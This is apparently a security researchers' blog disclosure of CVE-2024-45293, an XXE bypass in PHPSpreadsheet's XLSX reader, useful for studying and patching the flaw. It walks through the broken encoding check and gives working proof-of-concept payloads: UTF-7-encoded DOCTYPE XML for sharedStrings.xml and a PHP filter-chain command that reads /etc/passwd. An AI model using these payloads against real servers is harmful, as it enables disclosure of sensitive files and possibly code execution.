CVE-2024-45293: XXE in PHPSpreadsheet's Excel parser
25 October 2024
The PHPSpreadSheet
library, part of the widely used PHPOffice
open-source suite, was discovered to be vulnerable to XML External Entity (XXE) Injection. This vulnerability arises from improperly defined XXE sanitization filters within the XLSX reader, allowing for the parsing of user-supplied Excel spreadsheets.
Exploitation involves supplying a crafted Excel spreadsheet (XLSX) with an embedded XML file containing a payload. When processed, this payload can reveal sensitive files on servers running applications that depend on this library.
Although a fix for a similar XXE vulnerability was introduced in version 2.2.1, it was not sufficiently robust. This blog presents a bypass for the existing patch and explores the associated impacts.
Affected Versions include:
>= 2.2.0, < 2.3.0
< 1.29.1
>= 2.0.0, < 2.1.1
Since PHPSpreadsheet
is the successor for the now unmaintained PHPExcel
and is widely adopted, This vulnerability affects a range of applications that are utilizing one of the core features of the library.
The Shaheen research team reported the security vulnerability in August, which was later fixed and assigned CVE-2024-45293 in September 13th, 2024.
Background
For this analysis, we used a simple PHP script that leverages the PHPSpreadsheet
library to load a file under our control. The file in question is an Excel spreadsheet in XLSX format, which contains our Proof-of-Concept payload.
The workflow follows standard practices for using phpspreadsheet
, first, the file is passed to IOFactory
‘s load
method, followed by retrieving the active sheet using getActiveSheet
. Finally, the sheet’s content is read using the getRowIterator
/getCellIterator
methods.
The application script is as follows:
<?php
require __DIR__ . '/vendor/autoload.php';
use PhpOffice\PhpSpreadsheet\IOFactory;
use PhpOffice\PhpSpreadsheet\Worksheet\Worksheet;
class SpreadsheetReader {
/**
* Reads the active worksheet from a spreadsheet file and returns its data.
*
* @param string $filePath Path to the spreadsheet file.
* @return array Data from the active worksheet including title and cells.
*/
public function readSpreadsheet(string $filePath): array {
// Load the spreadsheet
$spreadsheet = IOFactory::load($filePath);
// Get the active sheet
$worksheet = $spreadsheet->getActiveSheet();
return $this->readWorksheet($worksheet);
}
/**
* Extracts data from the provided worksheet.
*
* @param Worksheet $worksheet The worksheet to read.
* @return array Data from the worksheet including title and cells.
*/
public function readWorksheet(Worksheet $worksheet): array {
$cellData = [];
foreach ($worksheet->getRowIterator() as $row) {
$cellIterator = $row->getCellIterator();
$cellIterator->setIterateOnlyExistingCells(true);
foreach ($cellIterator as $cell) {
$cellData[] = [
"Row" => $cell->getRow(),
"Column" => $cell->getColumn(),
"Value" => $cell->getValue(),
];
print_r($cell->getValue());
}
}
return $cellData;
}
}
// Example usage
$reader = new SpreadsheetReader();
$filePath = './poc.xlsx';
$data = $reader->readSpreadsheet($filePath);
print_r($data);
The application initializes the library by instantiating the SpreadsheetReader
class, and then calls the read
function on a file that we provide.
Parsing Excel (XLSX) sheets
public function readSpreadsheet(string $filePath): array {
// Load the spreadsheet
$spreadsheet = IOFactory::load($filePath);
// Get the active sheet
$worksheet = $spreadsheet->getActiveSheet();
return $this->readWorksheet($worksheet);
}
The SpreadsheetReader
relies on the IOFactory
class from the library to load an appropriate reader based on the file extension provided.
This is done through the createReaderForFile
function in IOReader
,
If the user provides a file with a supported extension (such as XLSX), a reader for that specific format is instantiated and subsequently used to load the file via the reader’s load
function.
The Details
The loader that handles Excel spreadsheets (XLSX) files is the loadSpreadsheetFromFile
, which is in Reader\XLSX
class.
Since Excel files are essentially just zip files containing XML and REL files, the function contains multiple references to loadZip
function which it uses to parse the different files within the spreadsheet.
/**
* Loads Spreadsheet from file.
*/
protected function loadSpreadsheetFromFile(string $filename): Spreadsheet
{
File::assertFile($filename, self::INITIAL_FILE);
// Initialisations
$excel = new Spreadsheet();
$excel->removeSheetByIndex(0);
$addingFirstCellStyleXf = true;
$addingFirstCellXf = true;
$unparsedLoadedData = [];
$this->zip = $zip = new ZipArchive();
$zip->open($filename);
// Read the theme first, because we need the colour scheme when reading the styles
[$workbookBasename, $xmlNamespaceBase] = $this->getWorkbookBaseName();
$drawingNS = self::REL_TO_DRAWING[$xmlNamespaceBase] ?? Namespaces::DRAWINGML;
$chartNS = self::REL_TO_CHART[$xmlNamespaceBase] ?? Namespaces::CHART;
$wbRels = $this->loadZip("xl/_rels/{$workbookBasename}.rels", Namespaces::RELATIONSHIPS);
...
...
$rels = $this->loadZip(self::INITIAL_FILE, Namespaces::RELATIONSHIPS);
...
...
The loadZip
function will go through the XML files within the uploaded spreadsheet, parse them using simplexml_load_string
, and then return them as SimpleXMLElement
, as seen in the definition below.
private function loadZip(string $filename, string $ns = '', bool $replaceUnclosedBr = false): SimpleXMLElement
{
$contents = $this->getFromZipArchive($this->zip, $filename);
if ($replaceUnclosedBr) {
$contents = str_replace('<br>', '<br/>', $contents);
}
$rels = simplexml_load_string(
$this->getSecurityScannerOrThrow()->scan($contents),
'SimpleXMLElement',
Settings::getLibXmlLoaderOptions(),
$ns
);
return self::testSimpleXml($rels);
}
Before parsing the contents of the file, the function does pass them to the scan
function in order to validate the content of the files, acting as a prevention measure for external XML entities (XXE) injection using the following approach on XLSX files in particular:
- Force convert the XML to utf-8 encoding if it is not already.
- If the conversion failed, then it reports it as suspicious XML and exits.
- If conversion worked
- the XML file is checked to see if it contains
<!DOCTYPE
string, which is an indication of a malicious XXE attempt. - If the string is found in the file, then the parser aborts with an error.
- Otherwise, the file is parsed as needed with the relatively safe function params
LIBXML_DTDLOAD
andLIBXML_DTDATTR
- the XML file is checked to see if it contains
This can be seen in the code snippet below highlighting the scan function:
public function scan($xml): string
{
$xml = "$xml";
$xml = $this->toUtf8($xml);
// Don't rely purely on libxml_disable_entity_loader()
$pattern = '/\\0?' . implode('\\0?', str_split($this->pattern)) . '\\0?/';
if (preg_match($pattern, $xml)) {
throw new Reader\Exception('Detected use of ENTITY in XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
}
if ($this->callback !== null) {
$xml = call_user_func($this->callback, $xml);
}
return $xml;
}
The $this→pattern
refers to the string <!DOCTYPE
.
The vulnerability - Have some space
This blacklist approach is based on the assumption that the UTF-8 conversion works as needed before the resulting file is checked for the blacklisted strings.
Checking the toUTF8
function, the function searches for the encoding in the XML file through the findCharSet
function.
private function toUtf8(string $xml): string
{
$charset = $this->findCharSet($xml);
if ($charset !== 'UTF-8') {
$xml = self::forceString(mb_convert_encoding($xml, 'UTF-8', $charset));
$charset = $this->findCharSet($xml);
if ($charset !== 'UTF-8') {
throw new Reader\Exception('Suspicious Double-encoded XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
}
}
return $xml;
}
private function findCharSet(string $xml): string
{
$patterns = [
'/encoding="([^"]*]?)"/',
"/encoding='([^']*?)'/",
];
foreach ($patterns as $pattern) {
if (preg_match($pattern, $xml, $matches)) {
return strtoupper($matches[1]);
}
}
return 'UTF-8';
}
<?xml version="1.0" encoding="UTF-8"?>
The findCharSet
function which checks, using regex, for the encoding of the XML content provided, returns a default UTF-8
if the patterns provided are not found within the input XML.
If the encoding attribute was matched and it is not UTF-8, then the content is converted to UTF-8 as seen in the first if
block of the toUtf8
function.
Herein lies the catch, this depends entirely on the fact that regex is a wide enough net that can catch all potential cases.
$patterns = [
'/encoding="([^"]*]?)"/',
"/encoding='([^']*?)'/",
];
This pattern searches that scanned file for the pattern encoding="…"
or encoding='…'
; however, it doesn’t take into account that one can use whitespace in the property declarations, i.e. encoding ='UTF-7'
(mainly intended for readability).
So an XML definition with the following:
<?xml version="1.0" encoding ='UTF-7'?>
Will not have its contents converted from UTF-7 to UTF-8. This is because it will be flagged as UTF-8 by the findCharSet
function as the regex will fail to find the encoding and therefore default to UTF-8. This allows for the <!DOCTYPE
string to be encoded with ease using UTF-7 encoding, bypassing the security filter, which searches ONLY for <!DOCTYPE
, and thus enabling XXE Injection.
Excel shared strings
Since external entities in DTDs are not substituted by default, it does complicate the process of disclosing information through XXE.
As such we need a way to get the information we aim to disclose reflected back to us. On that note, Excel Spreadsheets utilize what is known as shared strings
as a mechanism to save space and reduce redundancy when the file is saved on disk.
This technique inventories repeated strings in the sheet’s cells, ids them, and stores them in the sharedStrings.xml
file. This allows it to put the id of the repeated string in its respective cells, ultimately saving space.
Now we say all that to indicate that the shared strings file is an XML file, and we can inject our XXE payload there and reflect the value we want back through the cells that contain said strings.
Disclosing the data - PHP filter wrapper & XML parameter entities
With the filter bypass discovered, we can inject XML entities and get them parsed.
The <!DOCTYPE
filter can be bypassed by adding a space when defining the encoding, and using UTF-7 representation for <
that is preceding the !DOCTYPE
definition.
<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE abc [ ... ]>
However, as explained, there are some limitations that one has to work around. For example, external entities won’t resolve due to the missing NOENT
flag for simpexml_load_string
.
There is a slight trick that does work however, using a combination of the PHP filter wrapper and parameter entities, we can define custom entities and then call them within the XML; This does sound confusing, the example below hopefully should clear the idea.
- Base64 encode the following entity string
<!ENTITY internal 'abc'>:
echo "<\!ENTITY internal 'abc' >" | base64
- Then assign it to the value of the a parameter entity using SYSTEM and PHP filter wrapper.
<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "php://filter//resource=data://text/plain;base64,PCFFTlRJVFkgaW50ZXJuYWwgJ2FiYycgID4K" > %xxe;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>&internal;</t></si></sst>
When this is run, we can see that the internal entity is created and its value abc
is used as the value for the shared string.
This can be escalated to read internal system files utilizing the same PHP filter wrappers!
PHP filters allows us to read any resource on the system, and even perform conversion/encodings (including adding prefixes and suffixes, the main source of complexity) on it before retrieval such as base64 encoding/decoding for example.
We can’t simply read the file and reflect its content directly, however, due to the flags on the simplexml_read_string
function. We must get a little creative, as we have to create an entity with the file contents as its value so that we call the entity, we get its value. The end value for the xxe
entity should be <!ENTITY _name_ 'RESOURCE CONTENTS'>
.
This can be achieved by utilizing the PHP filter wrapper’s filter chains which are greatly described by Synacktiv on their blog, and by Charles Fol with the wrapwrap tool blog. They will be used to add a prefix of !<ENTITY _name_ '
and a suffix of '>
to enclose the file contents in order to have a correct XML syntax.
To that end, the wrapwrap script was used to generate the proof-of-concept. It is worth noting that the payload is lengthy, and due to length constraints of the simplexml_load_string
function, we can only have around ~50000 characters within the system literal. Relative to this, a payload to extract 54 characters is about ~35,000-50,000 bytes depending on the prefix and suffix.
Create the filter chain payload:
python wrapwrap/wrapwrap.py "/etc/passwd" "<\!ENTITY i '" "'>" 54
Sample chain:
php://filter/convert.base64-encode/convert.base64-encode/convert.iconv.855.UTF7/convert.base64-encode/convert.iconv.855.UTF7/conv....
...
...decode/dechunk/convert.base64-decode/convert.base64-decode/resource=/etc/passwd
Prepare the XXE payload:
<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "PAYLOAD_GOES_HERE" > %xxe;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>&ENTITY_NAME_GOES_HERE;</t></si></sst>
With the modified sharedStrings.xml
file containing the payload parsed, a portion of the /etc/passwd file is disclosed signifying a successful XXE attempt.
With research such as Charles Fol’s Iconv, set the charset to RCE, this increases the potential impacts of this XXE vulnerability from a simple disclosure to (potential) RCE.
Affected Apps
PHPSpreadsheet is used across many PHP projects, including Moodle and Kimai.
Kimai uses PHPSpreadsheet for importing and exporting invoices. This functionality in particular requires admin access to the platform. Once such access is obtained, the aforementioned vulnerability can be used to then upload a crafted XLSX invoice template to trigger the XXE.
This was reported to Kimai and was later fixed in version 2.21.0 alongside the PHPSpreadsheet patch.
Conclusion
Considering the level of adoption PHPSpreadsheet has, its important that applications and frameworks utilizing it patch up and update to the latest version.